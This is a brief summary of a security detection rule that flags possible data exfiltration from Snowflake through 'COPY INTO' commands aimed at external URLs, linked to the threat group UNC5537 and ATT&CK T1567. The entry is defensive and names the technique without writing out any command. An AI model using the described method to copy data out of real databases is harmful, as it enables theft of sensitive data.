
Summary
This detection rule is designed to identify potential data exfiltration attempts via the Snowflake database service. It specifically looks for the use of the "COPY INTO" command followed by a URL pattern within Snowflake's query history. The detection logic focuses on queries executed in the last two hours, using a regular expression to match the command structure that could indicate an attempt to transfer data to external URLs. The rule is associated with the threat actor group UNC5537, known for using similar methods for data exfiltration, and is utilized in a context where sensitive data may be at risk when accessed via potentially insecure web services. Detecting such patterns early can help prevent unauthorized data access or leaking.
Categories
- Cloud
- Database
Data Sources
- Application Log
ATT&CK Techniques
- T1567
Created: 2024-05-31